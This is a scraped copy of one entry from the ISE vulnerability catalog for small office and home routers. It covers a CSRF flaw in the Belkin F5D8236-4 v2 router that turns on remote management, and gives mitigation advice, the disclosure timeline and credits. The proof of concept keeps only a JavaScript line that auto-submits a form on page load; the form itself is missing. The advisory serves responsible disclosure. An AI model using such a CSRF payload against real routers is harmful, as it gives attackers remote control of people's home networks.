ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
Solution<br />
♦ There currently is not a solution to this problem.<br />
♦ Restrict access to WAN services such as remote management to prevent an<br />
attacker from gaining access if an attack is successful.<br />
Proof of Concept Exploit<br />
<br />
<br />
Belkin F5D8236-‐4 v2 CSRF -‐ Enable Remote MGMT. <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); <br />
<br />
<br />
<br />
Disclosure Timeline<br />
♦ 2/11/2013 - Notified Belkin<br />
♦ 4/15/2013 - Public Disclosure<br />
*In between the initial notification and the public disclosure, <strong>ISE</strong> reached out to Belkin multiple times<br />
requesting that our vulnerabilities were escalated to the proper support team.<br />
References<br />
♦ Advisory/Video: http://infosec42.blogspot.com<br />
♦ http://securityevaluators.com/content/case-studies/<br />
Credit<br />
♦ Discovered By: Jacob Holcomb – <strong>Security</strong> Analyst @ <strong>Independent</strong> <strong>Security</strong><br />
Evaluators<br />
♦ Exploited By: Jacob Holcomb – <strong>Security</strong> Analyst @ <strong>Independent</strong> <strong>Security</strong><br />
Evaluators<br />
<br />
83